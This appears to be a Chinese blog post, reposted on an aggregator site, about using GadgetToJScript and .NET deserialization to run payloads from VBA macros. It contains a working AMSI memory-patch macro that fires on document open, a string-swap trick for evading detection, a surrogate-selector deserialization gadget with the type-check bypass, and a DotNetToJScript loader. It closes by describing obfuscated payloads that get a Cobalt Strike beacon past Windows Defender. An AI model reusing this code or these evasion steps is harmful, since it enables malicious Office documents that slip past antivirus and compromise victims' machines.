GadgetToJScript在VBA中的利用

程序猿 • 2025年11月6日 10:13:10 • 系统教程 • 阅读 4

前言：

最近在学习一些不错的思路，本文是对下面文章的学习记录。

https://www.shutingrz.com/post/explore-dotnet-serialize-g2js/

开了原创，方便转载，勿喷。

本文将浅析GadgetToJScript的反序列化原理与在VBA中的利用。首先我们来看一下VBA中常见的执行方式

WScript.Shell：

代码语言：javascript代码运行次数：0运行复制

CreateObject("WScript.Shell").Run "calc.exe"CreateObject("WScript.Shell").Exec "notepad.exe"

进程树如下：

用来反弹会话时，代码如下：
代码语言：javascript代码运行次数：0运行复制
CreateObject("WScript.Shell").Run "powershell.exe ..............."
调用WMI：
主要为使用wmi的Win32_Process的Create方法
代码语言：javascript代码运行次数：0运行复制
s = GetObject("winmgmts:.ootcimv2:Win32_Process").Create("notepad.exe", Null, Null, intProcessID)

进程树如下

调用COM：
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}{72C24DD5-D70A-438B-8A42-98424B88AFB8}{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代码语言：javascript代码运行次数：0运行复制
Set obj3 = GetObject("new:13709620-C279-11CE-A49E-444553540000")obj3.ShellExecute "PowerShell.exe", "", "", "runas", 0
进程树(与你的CISID有关)

Outlook.Application：
代码语言：javascript代码运行次数：0运行复制
Set outlookApp = CreateObject("Outlook.Application")outlookApp.CreateObject("Wscript.shell").Run "notepad.exe", 0
进程树

而这些方法因为都已公开许久，都或多或少的会被检测到。而拿我们常用的CS之类的为例，我们生成载荷，然后运行，在监控中会很清楚的看到过程被amsi所监控（payload做了简单修改）

检查过程如下：

而整个过程微软解释如下：

而在VBA中的被检测的列表已有大佬整理了出来：
https://github.com/synacktiv/AMSI-Bypass


当然，DDE与excel 4.0是不受amsi所保护的。而amsi的bypass也早已是老生常谈的话题，例如outflank提出的
https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/
或者是在VBA中进行memory patch
                                                                                                                                                    PatentPal专利申请写作                            
AI软件来为专利申请自动生成内容
                                                                                            13                                                                                                        查看详情                                                                                        代码语言：javascript代码运行次数：0运行复制
Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtrPrivate Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtrPrivate Declare PtrSafe Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProtect As Long, lpflOldProtect As Long) As LongPrivate Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As LongPtr)Private Sub Document_Open()    Dim AmsiDLL As LongPtr    Dim AmsiScanBufferAddr As LongPtr    Dim result As Long    Dim MyByteArray(6) As Byte    Dim ArrayPointer As LongPtr    MyByteArray(0) = 184 ' 0xB8    MyByteArray(1) = 87  ' 0x57    MyByteArray(2) = 0   ' 0x00    MyByteArray(3) = 7   ' 0x07    MyByteArray(4) = 128 ' 0x80    MyByteArray(5) = 195 ' 0xC3    AmsiDLL = LoadLibrary("amsi.dll")    AmsiScanBufferAddr = GetProcAddress(AmsiDLL, "AmsiScanBuffer")    result = VirtualProtect(ByVal AmsiScanBufferAddr, 5, 64, 0)    ArrayPointer = VarPtr(MyByteArray(0))    CopyMemory ByVal AmsiScanBufferAddr, ByVal ArrayPointer, 6    End Sub
但此类方法，亦会被windows defende + amsi 所拦截


而此类的检查则是基于字符串的，即amsi.dll与RtlMoveMemory，将RtlMoveMemory改成RtlFillMemory即可bypass，效果大体如下

GadgetToJScript与.net
在某些脚本语言中可以使用com对象，而com对象可以用来调用.net

而GadgetToJScript本质是反序列化的利用，下面是一个基础的反序列化代码
代码如下：
代码语言：javascript代码运行次数：0运行复制
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.IO;using System.Runtime.Serialization;using System.Runtime.Serialization.Formatters.Binary;using System.Configuration;namespace serializable{    class NonSerializable    {        private string _text;        public NonSerializable(string text){            _text = text;        }        public override string ToString(){            return _text;        }    }    // Custom serialization surrogate    class _SurrogateSelector : SurrogateSelector    {        public override ISerializationSurrogate GetSurrogate(Type type, StreamingContext context, out ISurrogateSelector selector){            selector = this;            if (!type.IsSerializable)            {                Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");                return (ISerializationSurrogate)Activator.CreateInstance(t);            }            return base.GetSurrogate(type, context, out selector);        }    }    class Program    {        static void TestObjectSerializedRef(){            BinaryFormatter fmt = new BinaryFormatter();            MemoryStream stm = new MemoryStream();            fmt.SurrogateSelector = new _SurrogateSelector();            fmt.Serialize(stm, new NonSerializable("Hello World!"));            stm.Position = 0;            // Should print Hello World!.            Console.WriteLine(fmt.Deserialize(stm));        }        static void Main(string[] args){             TestObjectSerializedRef();        }    }}
上述代码的意思是NonSerializable 类在构造函数中接受一个字符串，然后重写ToString函数，并返回一个sting对象。ToString允许 C# 中的所有类隐式继承 Object 类并返回一个字符串表示，所以当 Console.WriteLine() 被调用时会返回Hello World! 但是这个类没有Serializable属性，所以本质上是不能序列化的。但我们可以覆盖 SurrogateSelector 类的 GetSurrogate 方法，使其可以被反序列化。
编译执行，报错，这是因为.NET 4.8增加了对反序列化的检查。

我们可以使用设置DisableActivitySurrogateSelectorTypeCheck来绕过该检测。
代码语言：javascript代码运行次数：0运行复制
        static void Main(string[] args)        {            ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");            TestObjectSerializedRef();        }
成功反序列化。

使用DotNetToJScript 操作上述代码，生成的代码类似如下：
代码语言：javascript代码运行次数：0运行复制
Function Base64ToStream(b,l)  Dim enc, length, transform, ms  Set enc = CreateObject("System.Text.ASCIIEncoding")  length = enc.GetByteCount_2(b)  Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")  Set ms = CreateObject("System.IO.MemoryStream")  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, l  ms.Position = 0  Set Base64ToStream = msEnd FunctionDim shellSet shell = CreateObject("WScript.Shell")Dim verver = "v4.0.30319"On Error Resume Nextshell.RegRead "HKLMSOFTWAREMicrosoft.NETFramework4.0.30319"If Err.Number  0 Then  ver = "v2.0.50727"  Err.ClearEnd Ifshell.Environment("Process").Item("COMPLUS_Version") = verDim fmt_1Set fmt_1 = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")fmt_1.Deserialize_2(Base64ToStream(stage_1, 2341))If Err.Number  0 Then  Dim fmt_2  Set fmt_2 = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")  fmt_2.Deserialize_2(Base64ToStream(stage_2, 12424))End If
即使用COM 组件反序列化 Base64 编码的 .NET 对象。其代码结构解释如下：

即BinaryFormatter的反序列化加载。假设有下面的代码：
代码语言：javascript代码运行次数：0运行复制
using System;using System.Windows.Forms;namespace Test{    public class Program    {    public Program()    {      MessageBox.Show("Hello, World!");    }    }}
生成vbs文件：
代码语言：javascript代码运行次数：0运行复制
GadgetToJScript.exe -b -w vbs -c hello.cs -o test -d System.dll -d System.Windows.Forms.dll

静态可过windows defender ，执行可以弹框。然后放入宏中

然后我们换成之前的COM 对象来启动进程，弹出notepad

但是直接生成的payload是会被windows defender所检测到的，需要自行混淆。混淆后绕过windows defender执行成功。

但目前该类方法我们利用起来仍然不是很好利用，因为虽然可以绕过windows defender的检测，但假如我们使用com去调用powershell远程加载的时候仍然无法绕过widnows defender。但这已不是宏需要考虑的了，而是在powershell中amsi patch的问题了，在前方的代码中加入amsi patch，即可然过wdf对ps的检查，得到Cs的beacon。

     ▼
更多精彩推荐，请关注我们
▼

以上就是GadgetToJScript在VBA中的利用的详细内容，更多请关注创想鸟其它相关文章！
                                                        版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规的内容， 请发送邮件至 chuangxiangniao@163.com 举报，一经查实，本站将立刻删除。

发布者：程序猿，转转请注明出处：https://www.chuangxiangniao.com/p/377654.html

ai app cad excel git github java javascript js windows 文件存储

打赏

微信扫一扫

支付宝扫一扫

0 0

关于作者

程序猿签约作者

414.1K 文章

0 评论

2 粉丝

这个人很懒，什么都没有留下～

win10声音100都很小怎么办

上一篇 2025年11月6日 10:12:22

win10系统0xc0000225错误怎么办？

下一篇 2025年11月6日 10:13:28

好文分享

Uniapp 中如何不拉伸不裁剪地展示图片？

灵活展示图片：如何不拉伸不裁剪在界面设计中，常常需要以原尺寸展示用户上传的图片。本文将介绍一种在 uniapp 框架中实现该功能的简单方法。对于不同尺寸的图片，可以采用以下处理方式：极端宽高比：撑满屏幕宽度或高度，再等比缩放居中。非极端宽高比：居中显示，若能撑满则撑满。然而，如果需要不拉伸不…

程序猿
2025年12月24日
4000
好文分享

如何让小说网站控制台显示乱码，同时网页内容正常显示？

如何在不影响用户界面的情况下实现控制台乱码？当在小说网站上下载小说时，大家可能会遇到一个问题：网站上的文本在网页内正常显示，但是在控制台中却是乱码。如何实现此类操作，从而在不影响用户界面（UI）的情况下保持控制台乱码呢？答案在于使用自定义字体。网站可以通过在服务器端配置自定义字体，并通过在客户端…

程序猿
2025年12月24日
8000
好文分享

如何在地图上轻松创建气泡信息框？

地图上气泡信息框的巧妙生成地图上气泡信息框是一种常用的交互功能，它简便易用，能够为用户提供额外信息。本文将探讨如何借助地图库的功能轻松创建这一功能。利用地图库的原生功能大多数地图库，如高德地图，都提供了现成的信息窗体和右键菜单功能。这些功能可以通过以下途径实现：高德地图 JS API 参考文…

程序猿
2025年12月24日
4000
好文分享

如何使用 scroll-behavior 属性实现元素scrollLeft变化时的平滑动画？

如何实现元素scrollleft变化时的平滑动画效果？在许多网页应用中，滚动容器的水平滚动条（scrollleft）需要频繁使用。为了让滚动动作更加自然，你希望给scrollleft的变化添加动画效果。解决方案：scroll-behavior 属性要实现scrollleft变化时的平滑动画效果…

程序猿
2025年12月24日
0000
好文分享

如何为滚动元素添加平滑过渡，使滚动条滑动时更自然流畅？

给滚动元素平滑过渡如何在滚动条属性（scrollleft）发生改变时为元素添加平滑的过渡效果？解决方案：scroll-behavior 属性为滚动容器设置 scroll-behavior 属性可以实现平滑滚动。 html 代码： click the button to slide right!…

程序猿
2025年12月24日
5000
好文分享

如何选择元素个数不固定的指定类名子元素？

灵活选择元素个数不固定的指定类名子元素在网页布局中，有时需要选择特定类名的子元素，但这些元素的数量并不固定。例如，下面这段 html 代码中，activebar 和 item 元素的数量均不固定： *n *n 如果需要选择第一个 item元素，可以使用 css 选择器 :nth-child()。该…

程序猿
2025年12月24日
2000
好文分享

使用 SVG 如何实现自定义宽度、间距和半径的虚线边框？

使用 svg 实现自定义虚线边框如何实现一个具有自定义宽度、间距和半径的虚线边框是一个常见的前端开发问题。传统的解决方案通常涉及使用 border-image 引入切片图片，但是这种方法存在引入外部资源、性能低下的缺点。为了避免上述问题，可以使用 svg（可缩放矢量图形）来创建纯代码实现。一种方…

程序猿
2025年12月24日
1000
好文分享

如何让“元素跟随文本高度，而不是撑高父容器？

如何让元素跟随文本高度，而不是撑高父容器在页面布局中，经常遇到父容器高度被子元素撑开的问题。在图例所示的案例中，父容器被较高的图片撑开，而文本的高度没有被考虑。本问答将提供纯css解决方案，让图片跟随文本高度，确保父容器的高度不会被图片影响。解决方法为了解决这个问题，需要将图片从文档流中脱离…

程序猿
2025年12月24日
0000
好文分享

CSS元素设置em和transition后，为何载入页面无放大效果？

css元素设置em和transition后，为何载入无放大效果很多开发者在设置了em和transition后，却发现元素载入页面时无放大效果。本文将解答这一问题。原问题：在视频演示中，将元素设置如下，载入页面会有放大效果。然而，在个人尝试中，并未出现该效果。这是由于macos和windows系统…

程序猿
2025年12月24日
2000
好文分享

为什么 CSS mask 属性未请求指定图片？

解决 css mask 属性未请求图片的问题在使用 css mask 属性时，指定了图片地址，但网络面板显示未请求获取该图片，这可能是由于浏览器兼容性问题造成的。问题如下代码所示：立即学习“前端免费学习笔记（深入）”； icon [data-icon=”cloud”] { –icon-cl…

程序猿
2025年12月24日
2000
好文分享

如何利用 CSS 选中激活标签并影响相邻元素的样式？

如何利用 css 选中激活标签并影响相邻元素？为了实现激活标签影响相邻元素的样式需求，可以通过 :has 选择器来实现。以下是如何具体操作：对于激活标签相邻后的元素，可以在 css 中使用以下代码进行设置： li:has(+li.active) { border-radius: 0 0 10px…

程序猿
2025年12月24日
1000
好文分享

如何模拟Windows 10 设置界面中的鼠标悬浮放大效果？

win10设置界面的鼠标移动显示周边的样式（探照灯效果）的实现方式在windows设置界面的鼠标悬浮效果中，光标周围会显示一个放大区域。在前端开发中，可以通过多种方式实现类似的效果。使用css 使用css的transform和box-shadow属性。通过将transform: scale(1.…

程序猿
2025年12月24日
2000
好文分享

如何用HTML/JS实现Windows 10设置界面鼠标移动探照灯效果？

Win10设置界面中的鼠标移动探照灯效果实现指南想要在前端开发中实现类似于Windows 10设置界面的鼠标移动探照灯效果，有两种解决方案：CSS 和 HTML/JS 组合。 CSS 实现不幸的是，仅使用CSS无法完全实现该效果。立即学习“前端免费学习笔记（深入）”； HTML/JS 实现要…

程序猿
2025年12月24日
0000
好文分享

为什么我的 Safari 自定义样式表在百度页面上失效了？

为什么在 Safari 中自定义样式表未能正常工作？在 Safari 的偏好设置中设置自定义样式表后，您对其进行测试却发现效果不同。在您自己的网页中，样式有效，而在百度页面中却失效。造成这种情况的原因是，第一个访问的项目使用了文件协议，可以访问本地目录中的图片文件。而第二个访问的百度使用了 ht…

程序猿
2025年12月24日
0000
好文分享

如何用前端实现 Windows 10 设置界面的鼠标移动探照灯效果？

如何在前端实现 Windows 10 设置界面中的鼠标移动探照灯效果想要在前端开发中实现 Windows 10 设置界面中类似的鼠标移动探照灯效果，可以通过以下途径： CSS 解决方案 DEMO 1: Windows 10 网格悬停效果：https://codepen.io/tr4553r7/pe…

程序猿
2025年12月24日
0000
好文分享

如何用前端技术实现Windows 10 设置界面鼠标移动时的探照灯效果？

探索在前端中实现 Windows 10 设置界面鼠标移动时的探照灯效果在前端开发中，鼠标悬停在元素上时需要呈现类似于 Windows 10 设置界面所展示的探照灯效果，这其中涉及到了元素外围显示光圈效果的技术实现。 CSS 实现虽然 CSS 无法直接实现探照灯效果，但可以通过以下技巧营造出类似效…

程序猿
2025年12月24日
0000
好文分享

使用CSS mask属性指定图片URL时，为什么浏览器无法加载图片？

css mask属性未能加载图片的解决方法使用css mask属性指定图片url时，如示例中所示： mask: url(“https://api.iconify.design/mdi:apple-icloud.svg”) center / contain no-repeat; 但是，在网络面板中却…

程序猿
2025年12月24日
0000
好文分享

如何用CSS Paint API为网页元素添加时尚的斑马线边框？

为元素添加时尚的斑马线边框在网页设计中，有时我们需要添加时尚的边框来提升元素的视觉效果。其中，斑马线边框是一种既醒目又别致的设计元素。实现斜向斑马线边框要实现斜向斑马线间隔圆环，我们可以使用css paint api。该api提供了强大的功能，可以让我们在元素上绘制复杂的图形。立即学习“前端…

程序猿
2025年12月24日
0000
好文分享

图片如何不撑高父容器？

如何让图片不撑高父容器？当父容器包含不同高度的子元素时，父容器的高度通常会被最高元素撑开。如果你希望父容器的高度由文本内容撑开，避免图片对其产生影响，可以通过以下 css 解决方法：绝对定位元素： .child-image { position: absolute; top: 0; left: …

程序猿
2025年12月24日
0000
CSS 帮助

我正在尝试将文本附加到棕色框的左侧。我不能。我不知道代码有什么问题。请帮助我。 css .hero { position: relative; bottom: 80px; display: flex; justify-content: left; align-items: start; color:…

程序猿
2025年12月24日 • 好文分享
2000

发表回复

登录后才能评论

GadgetToJScript在VBA中的利用

关于作者

相关推荐

发表回复